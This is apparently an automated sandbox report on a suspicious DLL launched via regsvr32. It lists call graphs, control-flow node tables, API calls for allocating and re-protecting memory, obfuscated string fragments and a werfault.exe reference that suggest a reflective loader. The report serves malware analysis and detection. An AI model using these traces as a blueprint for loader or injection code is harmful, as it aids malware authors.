18758 7fef9d2805b GetModuleFileNameA 18756->18758 18759 7fef9d2aa40 __initmbctable 24 API calls 18757->18759 18760 7fef9d28083 18758->18760 18759->18758 18761 7fef9d29240 18762 7fef9d2925f 18761->18762 18763 7fef9d2924d 18761->18763 18764 7fef9d29281 InitializeCriticalSectionAndSpinCount 18762->18764 18765 7fef9d29295 18762->18765 18764->18765 18767 7fef9d29360 LeaveCriticalSection 18765->18767 18767->18763 18768 7fef9d2ae40 18769 7fef9d2d490 std::exception::_Copy_str 17 API calls 18768->18769 18770 7fef9d2ae59 18769->18770 18771 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18770->18771 18772 7fef9d2ae86 std::exception::_Copy_str 18771->18772 18773 7fef9d30fd0 17 API calls 18772->18773 18776 7fef9d2af3a std::exception::_Copy_str 18772->18776 18774 7fef9d2af0d 18773->18774 18775 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18774->18775 18775->18776 18777 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18776->18777 18779 7fef9d2b2e0 18776->18779 18777->18779 18778 7fef9d2b33e 18781 7fef9d30cc0 25 API calls 18778->18781 18779->18778 18780 7fef9d2d490 std::exception::_Copy_str 17 API calls 18779->18780 18782 7fef9d2b311 18780->18782 18783 7fef9d2b358 18781->18783 18785 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18782->18785 18784 7fef9d2b37d 18783->18784 18786 7fef9d2cff0 terminate 34 API calls 18783->18786 18789 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18784->18789 18785->18778 18787 7fef9d2b373 18786->18787 18788 7fef9d27090 _exit 33 API calls 18787->18788 18788->18784 18790 7fef9d2b3a0 18789->18790 18031 7fef9d3f53e 18032 7fef9d3f55c 18031->18032 18033 7fef9d3f74d 18032->18033 18034 7fef9d40170 23 API calls 18032->18034 18035 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18033->18035 18034->18033 18036 7fef9d3f7c5 18035->18036 18791 7fef9d41040 18794 7fef9d2e8f0 18791->18794 18793 7fef9d4108f 18795 7fef9d2e90d 18794->18795 18796 7fef9d33cc0 __SehTransFilter 39 API calls 18795->18796 18797 7fef9d2e980 18796->18797 18797->18793 18798 7fef9d3dc41 18799 7fef9d3ee40 25 API calls 18798->18799 18800 7fef9d3da75 18799->18800 18801 7fef9d3eca1 18800->18801 18805 7fef9d3dbb5 18800->18805 18802 7fef9d2bd70 _invalid_parameter 17 API calls 18801->18802 18803 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18801->18803 18802->18803 18804 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18803->18804 18806 7fef9d3ed9e 18804->18806 18807 7fef9d2bd70 _invalid_parameter 17 API calls 18805->18807 18807->18803 18808 7fef9d40e40 18809 7fef9d40e5e 18808->18809 18810 7fef9d40e50 18808->18810 18810->18809 18811 7fef9d23e00 3 API calls 18810->18811 18811->18809 18812 7fef9d2d04a 18813 7fef9d2d1d8 DecodePointer 18812->18813 18814 7fef9d2d1e8 18813->18814 18815 7fef9d2d1f0 18814->18815 18816 7fef9d27090 _exit 33 API calls 18814->18816 18817 7fef9d2d209 18814->18817 18816->18817 18819 7fef9d2d289 18817->18819 18821 7fef9d23d00 RtlEncodePointer 18817->18821 18819->18815 18822 7fef9d29360 LeaveCriticalSection 18819->18822 18821->18819 18822->18815 16197 7fef9d23471 16198 7fef9d2347a 16197->16198 16207 7fef9d234bc 16197->16207 16199 7fef9d23496 16198->16199 16209 7fef9d270b0 16198->16209 16212 7fef9d27d00 16199->16212 16206 7fef9d234a5 16206->16207 16208 7fef9d23e00 3 API calls 16206->16208 16208->16207 16222 7fef9d27280 16209->16222 16214 7fef9d27d0e 16212->16214 16213 7fef9d2349b 16216 7fef9d23e00 16213->16216 16214->16213 16215 7fef9d27d87 DeleteCriticalSection 16214->16215 16215->16214 16217 7fef9d23e23 16216->16217 16218 7fef9d23e0d FlsFree 16216->16218 16382 7fef9d290b0 16217->16382 16218->16217 16221 7fef9d288d0 HeapDestroy 16221->16206 16223 7fef9d27296 _exit 16222->16223 16224 7fef9d2744e 16223->16224 16225 7fef9d272c7 RtlDecodePointer 16223->16225 16232 7fef9d27368 _initterm 16223->16232 16226 7fef9d2745e 16224->16226 16266 7fef9d27520 16224->16266 16227 7fef9d272e5 DecodePointer 16225->16227 16225->16232 16229 7fef9d270c3 16226->16229 16230 7fef9d27520 _exit LeaveCriticalSection 16226->16230 16240 7fef9d27314 16227->16240 16229->16199 16231 7fef9d27479 16230->16231 16269 7fef9d274e0 16231->16269 16232->16224 16246 7fef9d26210 16232->16246 16237 7fef9d2736d DecodePointer 16245 7fef9d23d00 RtlEncodePointer 16237->16245 16240->16232 16240->16237 16243 7fef9d27391 DecodePointer DecodePointer 16240->16243 16244 7fef9d23d00 RtlEncodePointer 16240->16244 16241 7fef9d27449 16259 7fef9d26f10 16241->16259 16243->16240 16244->16240 16245->16240 16247 7fef9d26229 16246->16247 16248 7fef9d2628f 16247->16248 16249 7fef9d262cb 16247->16249 16272 7fef9d2bd70 DecodePointer 16248->16272 16276 7fef9d29360 LeaveCriticalSection 16249->16276 16252 7fef9d262c3 16252->16224 16253 7fef9d27100 16252->16253 16254 7fef9d27112 16253->16254 16255 7fef9d271e4 DecodePointer 16254->16255 16256 7fef9d271fe 16255->16256 16301 7fef9d23d00 RtlEncodePointer 16256->16301 16258 7fef9d27219 16258->16241 16302 7fef9d263e0 16259->16302 16261 7fef9d26f8e 16263 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16261->16263 16262 7fef9d26f33 16262->16261 16310 7fef9d26660 16262->16310 16265 7fef9d26fa7 16263->16265 16265->16224 16378 7fef9d29360 LeaveCriticalSection 16266->16378 16268 7fef9d2752e 16268->16226 16379 7fef9d27490 GetModuleHandleW 16269->16379 16273 7fef9d2bdd0 16272->16273 16274 7fef9d2bdac 16272->16274 16277 7fef9d2be00 16273->16277 16274->16252 16276->16252 16280 7fef9d2be50 16277->16280 16281 7fef9d2be81 terminate 16280->16281 16282 7fef9d2be8d RtlCaptureContext RtlLookupFunctionEntry 16280->16282 16281->16282 16283 7fef9d2bf64 16282->16283 16284 7fef9d2bf1c RtlVirtualUnwind 16282->16284 16285 7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16283->16285 16284->16285 16286 7fef9d2bfde terminate 16285->16286 16289 7fef9d23280 16286->16289 16288 7fef9d2be2d GetCurrentProcess TerminateProcess 16288->16274 16290 7fef9d23289 16289->16290 16291 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16290->16291 16292 7fef9d23294 16290->16292 16293 7fef9d237a5 16291->16293 16294 7fef9d23764 RtlVirtualUnwind 16291->16294 16292->16288 16295 7fef9d237c7 IsDebuggerPresent 16293->16295 16294->16295 16300 7fef9d28d90 16295->16300 16297 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16298 7fef9d2384e GetCurrentProcess TerminateProcess 16297->16298 16299 7fef9d23844 terminate 16297->16299 16298->16288 16299->16298 16300->16297 16301->16258 16303 7fef9d263f1 16302->16303 16304 7fef9d26447 16303->16304 16307 7fef9d26480 16303->16307 16305 7fef9d2bd70 _invalid_parameter 17 API calls 16304->16305 16306 7fef9d2647b 16305->16306 16306->16262 16309 7fef9d26504 16307->16309 16314 7fef9d29360 LeaveCriticalSection 16307->16314 16309->16262 16311 7fef9d26681 _CrtMemDumpAllObjectsSince 16310->16311 16315 7fef9d26850 16311->16315 16313 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16313->16261 16314->16306 16316 7fef9d26871 16315->16316 16317 7fef9d26ba6 16316->16317 16320 7fef9d268ed _CrtIsValidPointer 16316->16320 16345 7fef9d29360 LeaveCriticalSection 16317->16345 16319 7fef9d26bb0 16319->16313 16321 7fef9d2695e IsBadReadPtr 16320->16321 16322 7fef9d26976 16320->16322 16331 7fef9d2692f 16320->16331 16321->16322 16323 7fef9d26ad2 16322->16323 16324 7fef9d26a29 16322->16324 16325 7fef9d26add 16323->16325 16328 7fef9d26b2d 16323->16328 16326 7fef9d26abe 16324->16326 16327 7fef9d26a86 IsBadReadPtr 16324->16327 16330 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16325->16330 16333 7fef9d26bf0 16326->16333 16327->16326 16327->16331 16328->16331 16332 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16328->16332 16330->16331 16331->16313 16332->16331 16334 7fef9d26c28 16333->16334 16335 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16334->16335 16336 7fef9d26c7a _CrtMemDumpAllObjectsSince 16334->16336 16337 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16335->16337 16340 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16336->16340 16346 7fef9d2c260 16336->16346 16338 7fef9d26e89 16337->16338 16338->16331 16350 7fef9d2c0c0 16340->16350 16342 7fef9d26e12 16342->16331 16343 7fef9d26dc7 16343->16342 16353 7fef9d26ea0 16343->16353 16345->16319 16348 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16346->16348 16347 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16347->16340 16348->16347 16357 7fef9d2f4d0 16348->16357 16368 7fef9d32260 16350->16368 16352 7fef9d2c103 16352->16343 16354 7fef9d26ed1 16353->16354 16355 7fef9d26ebd 16353->16355 16354->16342 16355->16354 16356 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16355->16356 16356->16354 16358 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16357->16358 16361 7fef9d2f570 16358->16361 16360 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16360->16347 16362 7fef9d2f599 MultiByteToWideChar 16361->16362 16364 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16362->16364 16366 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16362->16366 16365 7fef9d2f68b MultiByteToWideChar 16364->16365 16364->16366 16365->16366 16367 7fef9d2f6ca GetStringTypeW 16365->16367 16366->16360 16367->16366 16369 7fef9d3228b 16368->16369 16370 7fef9d322e1 16369->16370 16371 7fef9d3231f 16369->16371 16372 7fef9d2bd70 _invalid_parameter 17 API calls 16370->16372 16373 7fef9d32385 16371->16373 16376 7fef9d323c3 _calloc_dbg_impl 16371->16376 16375 7fef9d32315 _calloc_dbg_impl 16372->16375 16374 7fef9d2bd70 _invalid_parameter 17 API calls 16373->16374 16374->16375 16375->16352 16376->16375 16377 7fef9d2bd70 _invalid_parameter 17 API calls 16376->16377 16377->16375 16378->16268 16380 7fef9d274b2 GetProcAddress 16379->16380 16381 7fef9d274d1 ExitProcess 16379->16381 16380->16381 16383 7fef9d290be 16382->16383 16384 7fef9d2914d 16383->16384 16385 7fef9d290fd DeleteCriticalSection 16383->16385 16386 7fef9d234a0 16384->16386 16387 7fef9d29196 DeleteCriticalSection 16384->16387 16385->16383 16386->16221 16387->16384 16430 7fef9d28670 GetEnvironmentStringsW 16431 7fef9d28690 16430->16431 16432 7fef9d28697 WideCharToMultiByte 16430->16432 16434 7fef9d2875f FreeEnvironmentStringsW 16432->16434 16435 7fef9d28733 16432->16435 16434->16431 16435->16434 16436 7fef9d2876e WideCharToMultiByte 16435->16436 16437 7fef9d287c2 FreeEnvironmentStringsW 16436->16437 16438 7fef9d287aa 16436->16438 16437->16431 16438->16437 18076 7fef9d41370 18077 7fef9d3af60 _unlock_file2 2 API calls 18076->18077 18078 7fef9d41390 18077->18078 16639 7fef9d28860 HeapCreate 16640 7fef9d28891 GetVersion 16639->16640 16641 7fef9d2888d 16639->16641 16642 7fef9d288c1 16640->16642 16643 7fef9d288a7 HeapSetInformation 16640->16643 16642->16641 16643->16642 18079 7fef9d31b64 18080 7fef9d31b9d 18079->18080 18081 7fef9d31c86 18080->18081 18082 7fef9d3ab10 17 API calls 18080->18082 18083 7fef9d31bed 18080->18083 18081->18083 18084 7fef9d39290 23 API calls 18081->18084 18082->18081 18084->18083 18834 7fef9d35260 18835 7fef9d35296 __SehTransFilter _CreateFrameInfo 18834->18835 18836 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18835->18836 18837 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18836->18837 18085 7fef9d41160 18088 7fef9d34e90 18085->18088 18087 7fef9d41179 18089 7fef9d34ecf 18088->18089 18090 7fef9d34ebb 18088->18090 18089->18087 18090->18089 18091 7fef9d2cf50 terminate 35 API calls 18090->18091 18091->18089 18099 7fef9d3bb66 18100 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18099->18100 18101 7fef9d3bc46 18100->18101 18103 7fef9d3b99c 18100->18103 18102 7fef9d2bd70 _invalid_parameter 17 API calls 18101->18102 18106 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18102->18106 18104 7fef9d3cc93 18103->18104 18108 7fef9d3bada 18103->18108 18105 7fef9d2bd70 _invalid_parameter 17 API calls 18104->18105 18104->18106 18105->18106 18107 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18106->18107 18109 7fef9d3cd90 18107->18109 18110 7fef9d2bd70 _invalid_parameter 17 API calls 18108->18110 18110->18106

                                    Executed Functions

                                    Function 000007FEF9D212B0 Relevance: 144.4, APIs: 6, Strings: 76, Instructions: 872memorywindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                    • String ID: :Pt$aZ.$!k}$"<t$"BQa$#sa{$$cb($$v"P$)*E$*p$+80Z$+sui$,'a$,kb($-~5$1+t$1>#J$1D4v$3/Q$4cg$9cnt$:-ZZ$?#$@kb($A+M$CwT>$GBQ+$N tW$N7#6$Pv5=$QS}5$Qp_*$Qv5$Qv}N$VqQS$[`$]=5[$^ir$_>zT$_>zT$a%"^$aQTH$b('x$b(/N$bkg2$c(kA$eMh$g(%"$gWQ>tTQv5MVM6qQS<jb(kAk%aQTGeMhH)59cj$hH)}$iAk%$kj$k%$b$k%a^$kW]>$o(fA$oRP$pNR`$pw ~$p0$q.$$t+)s$t/p$uTQ2$u'($werfault.exe$xT]v$}LhH$L`$@+*$L1&$S<j$aEy$w5M$|Oi$hH
                                    • API String ID: 2181984824-2091011546
                                    • Opcode ID: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                    • Instruction ID: bb29df52505e4adc914c7d7009f7ad667354b97652f73d457c5e5bdb89db6ee0
                                    • Opcode Fuzzy Hash: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                    • Instruction Fuzzy Hash: 3FE2C8B250A7C18FE3748F66AE847DD3AA1F341748F609208C3991FA1DCB7A5255CF86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002C0000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 15 2c0000-2c0460 call 2c0aa8 * 2 VirtualAlloc 37 2c048a-2c0494 15->37 38 2c0462-2c0466 15->38 41 2c049a-2c049e 37->41 42 2c0a91-2c0aa6 37->42 39 2c0468-2c0488 38->39 39->37 39->39 41->42 43 2c04a4-2c04a8 41->43 43->42 44 2c04ae-2c04b2 43->44 44->42 45 2c04b8-2c04bf 44->45 45->42 46 2c04c5-2c04d2 45->46 46->42 47 2c04d8-2c04e1 46->47 47->42 48 2c04e7-2c04f4 47->48 48->42 49 2c04fa-2c0507 48->49 50 2c0509-2c0511 49->50 51 2c0531-2c0567 GetNativeSystemInfo 49->51 52 2c0513-2c0518 50->52 51->42 53 2c056d-2c0589 VirtualAlloc 51->53 54 2c051a-2c051f 52->54 55 2c0521 52->55 56 2c058b-2c059e 53->56 57 2c05a0-2c05ac 53->57 58 2c0523-2c052f 54->58 55->58 56->57 59 2c05af-2c05b2 57->59 58->51 58->52 61 2c05b4-2c05bf 59->61 62 2c05c1-2c05db 59->62 61->59 63 2c05dd-2c05e2 62->63 64 2c061b-2c0622 62->64 65 2c05e4-2c05ea 63->65 66 2c0628-2c062f 64->66 67 2c06db-2c06e2 64->67 68 2c05ec-2c0609 65->68 69 2c060b-2c0619 65->69 66->67 70 2c0635-2c0642 66->70 71 2c06e8-2c06f9 67->71 72 2c0864-2c086b 67->72 68->68 68->69 69->64 69->65 70->67 75 2c0648-2c064f 70->75 76 2c0702-2c0705 71->76 73 2c0917-2c0929 72->73 74 2c0871-2c087f 72->74 77 2c092f-2c0937 73->77 78 2c0a07-2c0a1a 73->78 79 2c090e-2c0911 74->79 80 2c0654-2c0658 75->80 81 2c06fb-2c06ff 76->81 82 2c0707-2c070a 76->82 84 2c093b-2c093f 77->84 105 2c0a1c-2c0a27 78->105 106 2c0a40-2c0a4a 78->106 79->73 83 2c0884-2c08a9 79->83 85 2c06c0-2c06ca 80->85 81->76 86 2c070c-2c071d 82->86 87 2c0788-2c078e 82->87 110 2c08ab-2c08b1 83->110 111 2c0907-2c090c 83->111 91 2c09ec-2c09fa 84->91 92 2c0945-2c095a 84->92 89 2c06cc-2c06d2 85->89 90 2c065a-2c0669 85->90 88 2c0794-2c07a2 86->88 93 2c071f-2c0720 86->93 87->88 95 2c085d-2c085e 88->95 96 2c07a8 88->96 89->80 97 2c06d4-2c06d5 89->97 101 2c067a-2c067e 90->101 102 2c066b-2c0678 90->102 91->84 103 2c0a00-2c0a01 91->103 99 2c095c-2c095e 92->99 100 2c097b-2c097d 92->100 104 2c0722-2c0784 93->104 95->72 107 2c07ae-2c07d4 96->107 97->67 112 2c096e-2c0979 99->112 113 2c0960-2c096c 99->113 115 2c097f-2c0981 100->115 116 2c09a2-2c09a4 100->116 117 2c068c-2c0690 101->117 118 2c0680-2c068a 101->118 114 2c06bd-2c06be 102->114 103->78 104->104 119 2c0786 104->119 120 2c0a38-2c0a3e 105->120 108 2c0a4c-2c0a54 106->108 109 2c0a7b-2c0a8e 106->109 142 2c0835-2c0839 107->142 143 2c07d6-2c07d9 107->143 108->109 122 2c0a56-2c0a78 108->122 109->42 131 2c08bb-2c08c8 110->131 132 2c08b3-2c08b9 110->132 111->79 123 2c09be-2c09bf 112->123 113->123 114->85 124 2c0989-2c098b 115->124 125 2c0983-2c0987 115->125 129 2c09ac-2c09bb 116->129 130 2c09a6-2c09aa 116->130 127 2c06a5-2c06a9 117->127 128 2c0692-2c06a3 117->128 126 2c06b6-2c06ba 118->126 119->88 120->106 121 2c0a29-2c0a35 120->121 121->120 122->109 137 2c09c5-2c09cb 123->137 124->116 135 2c098d-2c098f 124->135 125->123 126->114 127->114 136 2c06ab-2c06b3 127->136 128->126 129->123 130->123 139 2c08ca-2c08d1 131->139 140 2c08d3-2c08e5 131->140 138 2c08ea-2c08fe 132->138 144 2c0999-2c09a0 135->144 145 2c0991-2c0997 135->145 136->126 146 2c09cd-2c09d3 137->146 147 2c09d9-2c09e9 VirtualProtect 137->147 138->111 153 2c0900-2c0905 138->153 139->139 139->140 140->138 151 2c083b 142->151 152 2c0844-2c0850 142->152 149 2c07db-2c07e1 143->149 150 2c07e3-2c07f0 143->150 144->137 145->123 146->147 147->91 154 2c0812-2c082c 149->154 155 2c07fb-2c080d 150->155 156 2c07f2-2c07f9 150->156 151->152 152->107 157 2c0856-2c0857 152->157 153->110 154->142 159 2c082e-2c0833 154->159 155->154 156->155 156->156 157->95 159->143
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917322468.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_2c0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                    • API String ID: 2313188843-2517549848
                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction ID: 8ba112336fca9ef7a8b35a4b59e0e013f0f36789ae3b83468f658d617256cfb9
                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                    • Instruction Fuzzy Hash: 1A72C630628B49CBDB29DF18C885BB9B7E1FB98305F10472DE88AD7211DB34D956CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800165E4 Relevance: 10.4, Strings: 8, Instructions: 443COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 321 1800165e4-180016633 322 180016635-18001663a 321->322 323 180016640-180016645 322->323 324 180016ddf-180016e8f call 180011e5c 322->324 325 18001664b-180016650 323->325 326 180016b6f-180016dc9 call 18001b1b0 323->326 331 180016e94 324->331 329 180016656-18001665b 325->329 330 180016ea9-180016f23 call 180011624 325->330 337 180016922-180016927 326->337 338 180016dcf-180016dda 326->338 333 180016661-180016666 329->333 334 180016a86-180016b54 call 18000cec4 329->334 342 180016f28-180016f3a 330->342 335 180016e99-180016e9e 331->335 339 180016954-180016a81 call 18001d014 333->339 340 18001666c-180016671 333->340 347 180016b59-180016b5f 334->347 341 180016ea4 335->341 335->342 337->322 338->322 339->322 344 180016677-18001667c 340->344 345 18001692c-18001693a 340->345 341->322 350 180016682-180016687 344->350 351 1800168c1-18001691d call 180011624 344->351 349 180016940-180016944 345->349 347->342 348 180016b65-180016b6a 347->348 348->322 354 180016946-18001694f 349->354 355 18001693c-18001693d 349->355 350->335 356 18001668d-1800168bc call 1800254e4 call 180019254 call 1800207c4 350->356 351->337 354->322 355->349 356->322
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -~$!X$"98$5%dv$RXrB$}k=$t$t
                                    • API String ID: 0-2601355769
                                    • Opcode ID: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                    • Instruction ID: 40fa059977533c12daa4c197ac7ec32be5dd4a9ad21ad0dd792eee812670dda9
                                    • Opcode Fuzzy Hash: 1ffe31184e489043dfc0ad9b25877cc2ca41a6506ccf0b542c306d1cb23fc7eb
                                    • Instruction Fuzzy Hash: 4E32F4B1A0578C8BCBB9CF68C8997DD7BF0FB48318F90521DEA099B251CB745A45CB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180011E5C Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 386 180011e5c-180011f0e call 1800153f4 389 180011f11-180011f17 386->389 390 18001228a-180012290 389->390 391 180011f1d 389->391 394 180012534-180012596 call 180025c30 390->394 395 180012296-18001229c 390->395 392 180011f23-180011f29 391->392 393 1800121da-180012280 call 180011ccc 391->393 396 1800121d0-1800121d5 392->396 397 180011f2f-180011f35 392->397 393->390 414 1800125a2 394->414 415 180012598-18001259d 394->415 400 1800122a2-1800122a8 395->400 401 180012449-180012525 call 180015ae0 395->401 396->389 402 1800125c4-180012680 call 180011ccc 397->402 403 180011f3b-180011f41 397->403 407 1800123f7-180012439 call 180025c30 400->407 408 1800122ae-1800122b4 400->408 413 18001252a-18001252f 401->413 420 180012685-1800126a5 402->420 411 1800121b6-1800121cb 403->411 412 180011f47-180011f4d 403->412 407->420 428 18001243f-180012444 407->428 416 1800125b3-1800125b9 408->416 417 1800122ba-1800123f2 call 18000a02c call 180011624 408->417 411->389 423 180011f53-180011f59 412->423 424 180012126-180012198 call 18001917c 412->424 425 180012115-180012121 413->425 418 1800125a7-1800125b0 414->418 415->425 416->420 421 1800125bf 416->421 417->418 418->416 421->389 423->416 429 180011f5f-1800120af call 18000bab8 423->429 431 18001219d-1800121b1 424->431 425->389 428->425 429->413 435 1800120b5-180012112 call 1800216e4 429->435 431->425 435->425
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :j$UI$UI$/$5$@u
                                    • API String ID: 0-1744832406
                                    • Opcode ID: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                    • Instruction ID: 62cabd7460019d857fad8ef6802a9940dae2da1dd4c69d60ad9891f806a9e916
                                    • Opcode Fuzzy Hash: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                    • Instruction Fuzzy Hash: 35421971A1470EDFCB58DFA8C49A6EEBBF2FB44348F008159E806A7250DB719619CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180026F14 Relevance: 6.9, Strings: 5, Instructions: 675COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: F:^-$[9S$zUP$?'3$yc
                                    • API String ID: 0-3875576172
                                    • Opcode ID: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                    • Instruction ID: acf5a29543b44a4ac2cab22a28fc6f208f1c2d96f0abb29e90a070f971d4b191
                                    • Opcode Fuzzy Hash: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                    • Instruction Fuzzy Hash: 13720C7050038E8FDF49DF24C88A6DE3BA1FB68388F114619FC56962A1C7B4DA65CBC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180016320 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 518 180016320-180016344 519 18001634b-180016350 518->519 520 180016546-18001657e call 180011624 519->520 521 180016356-18001635b 519->521 533 180016583-180016588 520->533 522 180016361-180016366 521->522 523 18001658f-1800165d0 call 180011624 521->523 526 18001636c-180016371 522->526 527 1800164ae-180016541 call 18001917c 522->527 529 1800165d5-1800165e1 523->529 530 180016411-180016493 call 18000cec4 526->530 531 180016377-18001637c 526->531 527->519 540 180016498-18001649e 530->540 535 1800163e9-1800163f7 531->535 536 18001637e-180016383 531->536 533->529 538 18001658a 533->538 539 1800163fd-180016401 535->539 541 180016385-18001638a 536->541 542 180016397-1800163e4 call 180008350 536->542 538->519 543 180016403-18001640c 539->543 544 1800163f9-1800163fa 539->544 540->529 545 1800164a4-1800164a9 540->545 541->533 546 180016390-180016395 541->546 542->519 543->519 544->539 545->519 546->519
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !$>]$>]$vM/${Wo
                                    • API String ID: 0-1672528178
                                    • Opcode ID: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                    • Instruction ID: 47ac1da3a1e26fe678bf2a9ce2069fe56df1d0f6d245f307fc2b30da9b08538d
                                    • Opcode Fuzzy Hash: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                    • Instruction Fuzzy Hash: 5C81197051464CABDBE9DF28C8C9BDD3BA0FB58394F906119FD02862A0DB74D9C5CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180001378 Relevance: 5.4, Strings: 4, Instructions: 391COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
